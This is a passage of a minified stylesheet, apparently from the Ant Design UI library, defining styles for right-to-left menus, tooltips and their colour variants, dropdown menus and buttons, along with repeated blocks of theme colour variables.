rgba(255, 255, 255, 0.35) !important; } .ant-menu-dark .ant-menu-item-disabled > .ant-menu-submenu-title > .ant-menu-submenu-arrow::before, .ant-menu-dark .ant-menu-submenu-disabled > .ant-menu-submenu-title > .ant-menu-submenu-arrow::before, .ant-menu-dark .ant-menu-item-disabled > .ant-menu-submenu-title > .ant-menu-submenu-arrow::after, .ant-menu-dark .ant-menu-submenu-disabled > .ant-menu-submenu-title > .ant-menu-submenu-arrow::after { background: rgba(255, 255, 255, 0.35) !important; } .ant-menu.ant-menu-rtl { direction: rtl; text-align: right; } .ant-menu-rtl .ant-menu-item-group-title { text-align: right; } .ant-menu-rtl.ant-menu-inline, .ant-menu-rtl.ant-menu-vertical { border-right: none; border-left: 1px solid #f0f0f0; } .ant-menu-rtl.ant-menu-dark.ant-menu-inline, .ant-menu-rtl.ant-menu-dark.ant-menu-vertical { border-left: none; } .ant-menu-rtl.ant-menu-vertical.ant-menu-sub > .ant-menu-item, .ant-menu-rtl.ant-menu-vertical-left.ant-menu-sub > .ant-menu-item, .ant-menu-rtl.ant-menu-vertical-right.ant-menu-sub > .ant-menu-item, .ant-menu-rtl.ant-menu-vertical.ant-menu-sub > .ant-menu-submenu, .ant-menu-rtl.ant-menu-vertical-left.ant-menu-sub > .ant-menu-submenu, .ant-menu-rtl.ant-menu-vertical-right.ant-menu-sub > .ant-menu-submenu { transform-origin: top right; } .ant-menu-rtl .ant-menu-item .ant-menu-item-icon, .ant-menu-rtl .ant-menu-submenu-title .ant-menu-item-icon, .ant-menu-rtl .ant-menu-item .anticon, .ant-menu-rtl .ant-menu-submenu-title .anticon { margin-right: auto; margin-left: 10px; } .ant-menu-rtl .ant-menu-item.ant-menu-item-only-child > .ant-menu-item-icon, .ant-menu-rtl .ant-menu-submenu-title.ant-menu-item-only-child > .ant-menu-item-icon, .ant-menu-rtl .ant-menu-item.ant-menu-item-only-child > .anticon, .ant-menu-rtl .ant-menu-submenu-title.ant-menu-item-only-child > .anticon { margin-left: 0; } .ant-menu-submenu-rtl.ant-menu-submenu-popup { transform-origin: 100% 0; } .ant-menu-rtl .ant-menu-submenu-vertical > .ant-menu-submenu-title .ant-menu-submenu-arrow, .ant-menu-rtl .ant-menu-submenu-vertical-left > .ant-menu-submenu-title .ant-menu-submenu-arrow, .ant-menu-rtl .ant-menu-submenu-vertical-right > .ant-menu-submenu-title .ant-menu-submenu-arrow, .ant-menu-rtl .ant-menu-submenu-inline > .ant-menu-submenu-title .ant-menu-submenu-arrow { right: auto; left: 16px; } .ant-menu-rtl .ant-menu-submenu-vertical > .ant-menu-submenu-title .ant-menu-submenu-arrow::before, .ant-menu-rtl .ant-menu-submenu-vertical-left > .ant-menu-submenu-title .ant-menu-submenu-arrow::before, .ant-menu-rtl .ant-menu-submenu-vertical-right > .ant-menu-submenu-title .ant-menu-submenu-arrow::before { transform: rotate(-45deg) translateY(-2px); } .ant-menu-rtl .ant-menu-submenu-vertical > .ant-menu-submenu-title .ant-menu-submenu-arrow::after, .ant-menu-rtl .ant-menu-submenu-vertical-left > .ant-menu-submenu-title .ant-menu-submenu-arrow::after, .ant-menu-rtl .ant-menu-submenu-vertical-right > .ant-menu-submenu-title .ant-menu-submenu-arrow::after { transform: rotate(45deg) translateY(2px); } .ant-menu-rtl.ant-menu-vertical .ant-menu-item::after, .ant-menu-rtl.ant-menu-vertical-left .ant-menu-item::after, .ant-menu-rtl.ant-menu-vertical-right .ant-menu-item::after, .ant-menu-rtl.ant-menu-inline .ant-menu-item::after { right: auto; left: 0; } .ant-menu-rtl.ant-menu-vertical .ant-menu-item, .ant-menu-rtl.ant-menu-vertical-left .ant-menu-item, .ant-menu-rtl.ant-menu-vertical-right .ant-menu-item, .ant-menu-rtl.ant-menu-inline .ant-menu-item, .ant-menu-rtl.ant-menu-vertical .ant-menu-submenu-title, .ant-menu-rtl.ant-menu-vertical-left .ant-menu-submenu-title, .ant-menu-rtl.ant-menu-vertical-right .ant-menu-submenu-title, .ant-menu-rtl.ant-menu-inline .ant-menu-submenu-title { text-align: right; } .ant-menu-rtl.ant-menu-inline .ant-menu-submenu-title { padding-right: 0; padding-left: 34px; } .ant-menu-rtl.ant-menu-vertical .ant-menu-submenu-title { padding-right: 16px; padding-left: 34px; } .ant-menu-rtl.ant-menu-inline-collapsed.ant-menu-vertical .ant-menu-submenu-title { padding: 0 calc(50% - 16px / 2); } .ant-menu-rtl .ant-menu-item-group-list .ant-menu-item, .ant-menu-rtl .ant-menu-item-group-list .ant-menu-submenu-title { padding: 0 28px 0 16px; } .ant-menu-sub.ant-menu-inline { border: 0; } .ant-menu-rtl.ant-menu-sub.ant-menu-inline .ant-menu-item-group-title { padding-right: 32px; padding-left: 0; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-tooltip { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; position: absolute; z-index: 1070; display: block; width: -webkit-max-content; width: -moz-max-content; width: max-content; max-width: 250px; visibility: visible; } .ant-tooltip-hidden { display: none; } .ant-tooltip-placement-top, .ant-tooltip-placement-topLeft, .ant-tooltip-placement-topRight { padding-bottom: 8px; } .ant-tooltip-placement-right, .ant-tooltip-placement-rightTop, .ant-tooltip-placement-rightBottom { padding-left: 8px; } .ant-tooltip-placement-bottom, .ant-tooltip-placement-bottomLeft, .ant-tooltip-placement-bottomRight { padding-top: 8px; } .ant-tooltip-placement-left, .ant-tooltip-placement-leftTop, .ant-tooltip-placement-leftBottom { padding-right: 8px; } .ant-tooltip-inner { min-width: 30px; min-height: 32px; padding: 6px 8px; color: #fff; text-align: left; text-decoration: none; word-wrap: break-word; background-color: rgba(0, 0, 0, 0.75); border-radius: 2px; box-shadow: 0 3px 6px -4px rgba(0, 0, 0, 0.12), 0 6px 16px 0 rgba(0, 0, 0, 0.08), 0 9px 28px 8px rgba(0, 0, 0, 0.05); } .ant-tooltip-arrow { position: absolute; display: block; width: 13.07106781px; height: 13.07106781px; overflow: hidden; background: transparent; pointer-events: none; } .ant-tooltip-arrow-content { position: absolute; top: 0; right: 0; bottom: 0; left: 0; display: block; width: 5px; height: 5px; margin: auto; background-color: rgba(0, 0, 0, 0.75); content: ''; pointer-events: auto; } .ant-tooltip-placement-top .ant-tooltip-arrow, .ant-tooltip-placement-topLeft .ant-tooltip-arrow, .ant-tooltip-placement-topRight .ant-tooltip-arrow { bottom: -5.07106781px; } .ant-tooltip-placement-top .ant-tooltip-arrow-content, .ant-tooltip-placement-topLeft .ant-tooltip-arrow-content, .ant-tooltip-placement-topRight .ant-tooltip-arrow-content { box-shadow: 3px 3px 7px rgba(0, 0, 0, 0.07); transform: translateY(-6.53553391px) rotate(45deg); } .ant-tooltip-placement-top .ant-tooltip-arrow { left: 50%; transform: translateX(-50%); } .ant-tooltip-placement-topLeft .ant-tooltip-arrow { left: 13px; } .ant-tooltip-placement-topRight .ant-tooltip-arrow { right: 13px; } .ant-tooltip-placement-right .ant-tooltip-arrow, .ant-tooltip-placement-rightTop .ant-tooltip-arrow, .ant-tooltip-placement-rightBottom .ant-tooltip-arrow { left: -5.07106781px; } .ant-tooltip-placement-right .ant-tooltip-arrow-content, .ant-tooltip-placement-rightTop .ant-tooltip-arrow-content, .ant-tooltip-placement-rightBottom .ant-tooltip-arrow-content { box-shadow: -3px 3px 7px rgba(0, 0, 0, 0.07); transform: translateX(6.53553391px) rotate(45deg); } .ant-tooltip-placement-right .ant-tooltip-arrow { top: 50%; transform: translateY(-50%); } .ant-tooltip-placement-rightTop .ant-tooltip-arrow { top: 5px; } .ant-tooltip-placement-rightBottom .ant-tooltip-arrow { bottom: 5px; } .ant-tooltip-placement-left .ant-tooltip-arrow, .ant-tooltip-placement-leftTop .ant-tooltip-arrow, .ant-tooltip-placement-leftBottom .ant-tooltip-arrow { right: -5.07106781px; } .ant-tooltip-placement-left .ant-tooltip-arrow-content, .ant-tooltip-placement-leftTop .ant-tooltip-arrow-content, .ant-tooltip-placement-leftBottom .ant-tooltip-arrow-content { box-shadow: 3px -3px 7px rgba(0, 0, 0, 0.07); transform: translateX(-6.53553391px) rotate(45deg); } .ant-tooltip-placement-left .ant-tooltip-arrow { top: 50%; transform: translateY(-50%); } .ant-tooltip-placement-leftTop .ant-tooltip-arrow { top: 5px; } .ant-tooltip-placement-leftBottom .ant-tooltip-arrow { bottom: 5px; } .ant-tooltip-placement-bottom .ant-tooltip-arrow, .ant-tooltip-placement-bottomLeft .ant-tooltip-arrow, .ant-tooltip-placement-bottomRight .ant-tooltip-arrow { top: -5.07106781px; } .ant-tooltip-placement-bottom .ant-tooltip-arrow-content, .ant-tooltip-placement-bottomLeft .ant-tooltip-arrow-content, .ant-tooltip-placement-bottomRight .ant-tooltip-arrow-content { box-shadow: -3px -3px 7px rgba(0, 0, 0, 0.07); transform: translateY(6.53553391px) rotate(45deg); } .ant-tooltip-placement-bottom .ant-tooltip-arrow { left: 50%; transform: translateX(-50%); } .ant-tooltip-placement-bottomLeft .ant-tooltip-arrow { left: 13px; } .ant-tooltip-placement-bottomRight .ant-tooltip-arrow { right: 13px; } .ant-tooltip-pink .ant-tooltip-inner { background-color: #eb2f96; } .ant-tooltip-pink .ant-tooltip-arrow-content { background-color: #eb2f96; } .ant-tooltip-magenta .ant-tooltip-inner { background-color: #eb2f96; } .ant-tooltip-magenta .ant-tooltip-arrow-content { background-color: #eb2f96; } .ant-tooltip-red .ant-tooltip-inner { background-color: #f5222d; } .ant-tooltip-red .ant-tooltip-arrow-content { background-color: #f5222d; } .ant-tooltip-volcano .ant-tooltip-inner { background-color: #fa541c; } .ant-tooltip-volcano .ant-tooltip-arrow-content { background-color: #fa541c; } .ant-tooltip-orange .ant-tooltip-inner { background-color: #fa8c16; } .ant-tooltip-orange .ant-tooltip-arrow-content { background-color: #fa8c16; } .ant-tooltip-yellow .ant-tooltip-inner { background-color: #fadb14; } .ant-tooltip-yellow .ant-tooltip-arrow-content { background-color: #fadb14; } .ant-tooltip-gold .ant-tooltip-inner { background-color: #faad14; } .ant-tooltip-gold .ant-tooltip-arrow-content { background-color: #faad14; } .ant-tooltip-cyan .ant-tooltip-inner { background-color: #13c2c2; } .ant-tooltip-cyan .ant-tooltip-arrow-content { background-color: #13c2c2; } .ant-tooltip-lime .ant-tooltip-inner { background-color: #a0d911; } .ant-tooltip-lime .ant-tooltip-arrow-content { background-color: #a0d911; } .ant-tooltip-green .ant-tooltip-inner { background-color: #52c41a; } .ant-tooltip-green .ant-tooltip-arrow-content { background-color: #52c41a; } .ant-tooltip-blue .ant-tooltip-inner { background-color: #1890ff; } .ant-tooltip-blue .ant-tooltip-arrow-content { background-color: #1890ff; } .ant-tooltip-geekblue .ant-tooltip-inner { background-color: #2f54eb; } .ant-tooltip-geekblue .ant-tooltip-arrow-content { background-color: #2f54eb; } .ant-tooltip-purple .ant-tooltip-inner { background-color: #722ed1; } .ant-tooltip-purple .ant-tooltip-arrow-content { background-color: #722ed1; } .ant-tooltip-rtl { direction: rtl; } .ant-tooltip-rtl .ant-tooltip-inner { text-align: right; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-dropdown-menu-item.ant-dropdown-menu-item-danger { color: var(--ant-error-color); } .ant-dropdown-menu-item.ant-dropdown-menu-item-danger:hover { color: #fff; background-color: var(--ant-error-color); } .ant-dropdown { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; position: absolute; top: -9999px; left: -9999px; z-index: 1050; display: block; } .ant-dropdown::before { position: absolute; top: -4px; right: 0; bottom: -4px; left: -7px; z-index: -9999; opacity: 0.0001; content: ' '; } .ant-dropdown-wrap { position: relative; } .ant-dropdown-wrap .ant-btn > .anticon-down { font-size: 10px; } .ant-dropdown-wrap .anticon-down::before { transition: transform 0.2s; } .ant-dropdown-wrap-open .anticon-down::before { transform: rotate(180deg); } .ant-dropdown-hidden, .ant-dropdown-menu-hidden, .ant-dropdown-menu-submenu-hidden { display: none; } .ant-dropdown-show-arrow.ant-dropdown-placement-topCenter, .ant-dropdown-show-arrow.ant-dropdown-placement-topLeft, .ant-dropdown-show-arrow.ant-dropdown-placement-topRight { padding-bottom: 10px; } .ant-dropdown-show-arrow.ant-dropdown-placement-bottomCenter, .ant-dropdown-show-arrow.ant-dropdown-placement-bottomLeft, .ant-dropdown-show-arrow.ant-dropdown-placement-bottomRight { padding-top: 10px; } .ant-dropdown-arrow { position: absolute; z-index: 1; display: block; width: 8.48528137px; height: 8.48528137px; background: transparent; border-style: solid; border-width: 4.24264069px; transform: rotate(45deg); } .ant-dropdown-placement-topCenter > .ant-dropdown-arrow, .ant-dropdown-placement-topLeft > .ant-dropdown-arrow, .ant-dropdown-placement-topRight > .ant-dropdown-arrow { bottom: 6.2px; border-color: transparent #fff #fff transparent; box-shadow: 3px 3px 7px rgba(0, 0, 0, 0.07); } .ant-dropdown-placement-topCenter > .ant-dropdown-arrow { left: 50%; transform: translateX(-50%) rotate(45deg); } .ant-dropdown-placement-topLeft > .ant-dropdown-arrow { left: 16px; } .ant-dropdown-placement-topRight > .ant-dropdown-arrow { right: 16px; } .ant-dropdown-placement-bottomCenter > .ant-dropdown-arrow, .ant-dropdown-placement-bottomLeft > .ant-dropdown-arrow, .ant-dropdown-placement-bottomRight > .ant-dropdown-arrow { top: 6px; border-color: #fff transparent transparent #fff; box-shadow: -2px -2px 5px rgba(0, 0, 0, 0.06); } .ant-dropdown-placement-bottomCenter > .ant-dropdown-arrow { left: 50%; transform: translateX(-50%) rotate(45deg); } .ant-dropdown-placement-bottomLeft > .ant-dropdown-arrow { left: 16px; } .ant-dropdown-placement-bottomRight > .ant-dropdown-arrow { right: 16px; } .ant-dropdown-menu { position: relative; margin: 0; padding: 4px 0; text-align: left; list-style-type: none; background-color: #fff; background-clip: padding-box; border-radius: 2px; outline: none; box-shadow: 0 3px 6px -4px rgba(0, 0, 0, 0.12), 0 6px 16px 0 rgba(0, 0, 0, 0.08), 0 9px 28px 8px rgba(0, 0, 0, 0.05); } .ant-dropdown-menu-item-group-title { padding: 5px 12px; color: rgba(0, 0, 0, 0.45); transition: all 0.3s; } .ant-dropdown-menu-submenu-popup { position: absolute; z-index: 1050; background: transparent; box-shadow: none; transform-origin: 0 0; } .ant-dropdown-menu-submenu-popup ul, .ant-dropdown-menu-submenu-popup li { list-style: none; } .ant-dropdown-menu-submenu-popup ul { margin-right: 0.3em; margin-left: 0.3em; } .ant-dropdown-menu-item { position: relative; display: flex; align-items: center; } .ant-dropdown-menu-item-icon { min-width: 12px; margin-right: 8px; font-size: 12px; } .ant-dropdown-menu-title-content { flex: auto; } .ant-dropdown-menu-title-content > a { color: inherit; transition: all 0.3s; } .ant-dropdown-menu-title-content > a:hover { color: inherit; } .ant-dropdown-menu-title-content > a::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; content: ''; } .ant-dropdown-menu-item, .ant-dropdown-menu-submenu-title { clear: both; margin: 0; padding: 5px 12px; color: rgba(0, 0, 0, 0.85); font-weight: normal; font-size: 14px; line-height: 22px; white-space: nowrap; cursor: pointer; transition: all 0.3s; } .ant-dropdown-menu-item-selected, .ant-dropdown-menu-submenu-title-selected { color: var(--ant-primary-color); background-color: var(--ant-primary-1); } .ant-dropdown-menu-item:hover, .ant-dropdown-menu-submenu-title:hover { background-color: #f5f5f5; } .ant-dropdown-menu-item-disabled, .ant-dropdown-menu-submenu-title-disabled { color: rgba(0, 0, 0, 0.25); cursor: not-allowed; } .ant-dropdown-menu-item-disabled:hover, .ant-dropdown-menu-submenu-title-disabled:hover { color: rgba(0, 0, 0, 0.25); background-color: #fff; cursor: not-allowed; } .ant-dropdown-menu-item-disabled a, .ant-dropdown-menu-submenu-title-disabled a { pointer-events: none; } .ant-dropdown-menu-item-divider, .ant-dropdown-menu-submenu-title-divider { height: 1px; margin: 4px 0; overflow: hidden; line-height: 0; background-color: #f0f0f0; } .ant-dropdown-menu-item .ant-dropdown-menu-submenu-expand-icon, .ant-dropdown-menu-submenu-title .ant-dropdown-menu-submenu-expand-icon { position: absolute; right: 8px; } .ant-dropdown-menu-item .ant-dropdown-menu-submenu-expand-icon .ant-dropdown-menu-submenu-arrow-icon, .ant-dropdown-menu-submenu-title .ant-dropdown-menu-submenu-expand-icon .ant-dropdown-menu-submenu-arrow-icon { margin-right: 0 !important; color: rgba(0, 0, 0, 0.45); font-size: 10px; font-style: normal; } .ant-dropdown-menu-item-group-list { margin: 0 8px; padding: 0; list-style: none; } .ant-dropdown-menu-submenu-title { padding-right: 24px; } .ant-dropdown-menu-submenu-vertical { position: relative; } .ant-dropdown-menu-submenu-vertical > .ant-dropdown-menu { position: absolute; top: 0; left: 100%; min-width: 100%; margin-left: 4px; transform-origin: 0 0; } .ant-dropdown-menu-submenu.ant-dropdown-menu-submenu-disabled .ant-dropdown-menu-submenu-title, .ant-dropdown-menu-submenu.ant-dropdown-menu-submenu-disabled .ant-dropdown-menu-submenu-title .ant-dropdown-menu-submenu-arrow-icon { color: rgba(0, 0, 0, 0.25); background-color: #fff; cursor: not-allowed; } .ant-dropdown-menu-submenu-selected .ant-dropdown-menu-submenu-title { color: var(--ant-primary-color); } .ant-dropdown.ant-slide-down-enter.ant-slide-down-enter-active.ant-dropdown-placement-bottomLeft, .ant-dropdown.ant-slide-down-appear.ant-slide-down-appear-active.ant-dropdown-placement-bottomLeft, .ant-dropdown.ant-slide-down-enter.ant-slide-down-enter-active.ant-dropdown-placement-bottomCenter, .ant-dropdown.ant-slide-down-appear.ant-slide-down-appear-active.ant-dropdown-placement-bottomCenter, .ant-dropdown.ant-slide-down-enter.ant-slide-down-enter-active.ant-dropdown-placement-bottomRight, .ant-dropdown.ant-slide-down-appear.ant-slide-down-appear-active.ant-dropdown-placement-bottomRight { -webkit-animation-name: antSlideUpIn; animation-name: antSlideUpIn; } .ant-dropdown.ant-slide-up-enter.ant-slide-up-enter-active.ant-dropdown-placement-topLeft, .ant-dropdown.ant-slide-up-appear.ant-slide-up-appear-active.ant-dropdown-placement-topLeft, .ant-dropdown.ant-slide-up-enter.ant-slide-up-enter-active.ant-dropdown-placement-topCenter, .ant-dropdown.ant-slide-up-appear.ant-slide-up-appear-active.ant-dropdown-placement-topCenter, .ant-dropdown.ant-slide-up-enter.ant-slide-up-enter-active.ant-dropdown-placement-topRight, .ant-dropdown.ant-slide-up-appear.ant-slide-up-appear-active.ant-dropdown-placement-topRight { -webkit-animation-name: antSlideDownIn; animation-name: antSlideDownIn; } .ant-dropdown.ant-slide-down-leave.ant-slide-down-leave-active.ant-dropdown-placement-bottomLeft, .ant-dropdown.ant-slide-down-leave.ant-slide-down-leave-active.ant-dropdown-placement-bottomCenter, .ant-dropdown.ant-slide-down-leave.ant-slide-down-leave-active.ant-dropdown-placement-bottomRight { -webkit-animation-name: antSlideUpOut; animation-name: antSlideUpOut; } .ant-dropdown.ant-slide-up-leave.ant-slide-up-leave-active.ant-dropdown-placement-topLeft, .ant-dropdown.ant-slide-up-leave.ant-slide-up-leave-active.ant-dropdown-placement-topCenter, .ant-dropdown.ant-slide-up-leave.ant-slide-up-leave-active.ant-dropdown-placement-topRight { -webkit-animation-name: antSlideDownOut; animation-name: antSlideDownOut; } .ant-dropdown-trigger > .anticon.anticon-down, .ant-dropdown-link > .anticon.anticon-down, .ant-dropdown-button > .anticon.anticon-down { font-size: 10px; vertical-align: baseline; } .ant-dropdown-button { white-space: nowrap; } .ant-dropdown-button.ant-btn-group > .ant-btn-loading, .ant-dropdown-button.ant-btn-group > .ant-btn-loading + .ant-btn { cursor: default; pointer-events: none; } .ant-dropdown-button.ant-btn-group > .ant-btn-loading + .ant-btn::before { display: block; } .ant-dropdown-button.ant-btn-group > .ant-btn:last-child:not(:first-child):not(.ant-btn-icon-only) { padding-right: 8px; padding-left: 8px; } .ant-dropdown-menu-dark, .ant-dropdown-menu-dark .ant-dropdown-menu { background: #001529; } .ant-dropdown-menu-dark .ant-dropdown-menu-item, .ant-dropdown-menu-dark .ant-dropdown-menu-submenu-title, .ant-dropdown-menu-dark .ant-dropdown-menu-item > a, .ant-dropdown-menu-dark .ant-dropdown-menu-item > .anticon + span > a { color: rgba(255, 255, 255, 0.65); } .ant-dropdown-menu-dark .ant-dropdown-menu-item .ant-dropdown-menu-submenu-arrow::after, .ant-dropdown-menu-dark .ant-dropdown-menu-submenu-title .ant-dropdown-menu-submenu-arrow::after, .ant-dropdown-menu-dark .ant-dropdown-menu-item > a .ant-dropdown-menu-submenu-arrow::after, .ant-dropdown-menu-dark .ant-dropdown-menu-item > .anticon + span > a .ant-dropdown-menu-submenu-arrow::after { color: rgba(255, 255, 255, 0.65); } .ant-dropdown-menu-dark .ant-dropdown-menu-item:hover, .ant-dropdown-menu-dark .ant-dropdown-menu-submenu-title:hover, .ant-dropdown-menu-dark .ant-dropdown-menu-item > a:hover, .ant-dropdown-menu-dark .ant-dropdown-menu-item > .anticon + span > a:hover { color: #fff; background: transparent; } .ant-dropdown-menu-dark .ant-dropdown-menu-item-selected, .ant-dropdown-menu-dark .ant-dropdown-menu-item-selected:hover, .ant-dropdown-menu-dark .ant-dropdown-menu-item-selected > a { color: #fff; background: var(--ant-primary-color); } .ant-dropdown-rtl { direction: rtl; } .ant-dropdown-rtl.ant-dropdown::before { right: -7px; left: 0; } .ant-dropdown-menu.ant-dropdown-menu-rtl { direction: rtl; text-align: right; } .ant-dropdown-rtl .ant-dropdown-menu-item-group-title, .ant-dropdown-menu-submenu-rtl .ant-dropdown-menu-item-group-title { direction: rtl; text-align: right; } .ant-dropdown-menu-submenu-popup.ant-dropdown-menu-submenu-rtl { transform-origin: 100% 0; } .ant-dropdown-rtl .ant-dropdown-menu-submenu-popup ul, .ant-dropdown-rtl .ant-dropdown-menu-submenu-popup li { text-align: right; } .ant-dropdown-rtl .ant-dropdown-menu-item, .ant-dropdown-rtl .ant-dropdown-menu-submenu-title { text-align: right; } .ant-dropdown-rtl .ant-dropdown-menu-item > .anticon:first-child, .ant-dropdown-rtl .ant-dropdown-menu-submenu-title > .anticon:first-child, .ant-dropdown-rtl .ant-dropdown-menu-item > span > .anticon:first-child, .ant-dropdown-rtl .ant-dropdown-menu-submenu-title > span > .anticon:first-child { margin-right: 0; margin-left: 8px; } .ant-dropdown-rtl .ant-dropdown-menu-item .ant-dropdown-menu-submenu-expand-icon, .ant-dropdown-rtl .ant-dropdown-menu-submenu-title .ant-dropdown-menu-submenu-expand-icon { right: auto; left: 8px; } .ant-dropdown-rtl .ant-dropdown-menu-item .ant-dropdown-menu-submenu-expand-icon .ant-dropdown-menu-submenu-arrow-icon, .ant-dropdown-rtl .ant-dropdown-menu-submenu-title .ant-dropdown-menu-submenu-expand-icon .ant-dropdown-menu-submenu-arrow-icon { margin-left: 0 !important; transform: scaleX(-1); } .ant-dropdown-rtl .ant-dropdown-menu-submenu-title { padding-right: 12px; padding-left: 24px; } .ant-dropdown-rtl .ant-dropdown-menu-submenu-vertical > .ant-dropdown-menu { right: 100%; left: 0; margin-right: 4px; margin-left: 0; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-btn { line-height: 1.5715; position: relative; display: inline-block; font-weight: 400; white-space: nowrap; text-align: center; background-image: none; border: 1px solid transparent; box-shadow: 0 2px 0 rgba(0, 0, 0, 0.015); cursor: pointer; transition: all 0.3s cubic-bezier(0.645, 0.045, 0.355, 1); -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; touch-action: manipulation; height: 32px; padding: 4px 15px; font-size: 14px; border-radius: 2px; color: rgba(0, 0, 0, 0.85); border-color: #d9d9d9; background: #fff; } .ant-btn > .anticon { line-height: 1; } .ant-btn, .ant-btn:active, .ant-btn:focus { outline: 0; } .ant-btn:not([disabled]):hover { text-decoration: none; } .ant-btn:not([disabled]):active { outline: 0; box-shadow: none; } .ant-btn[disabled] { cursor: not-allowed; } .ant-btn[disabled] > * { pointer-events: none; } .ant-btn-lg { height: 40px; padding: 6.4px 15px; font-size: 16px; border-radius: 2px; } 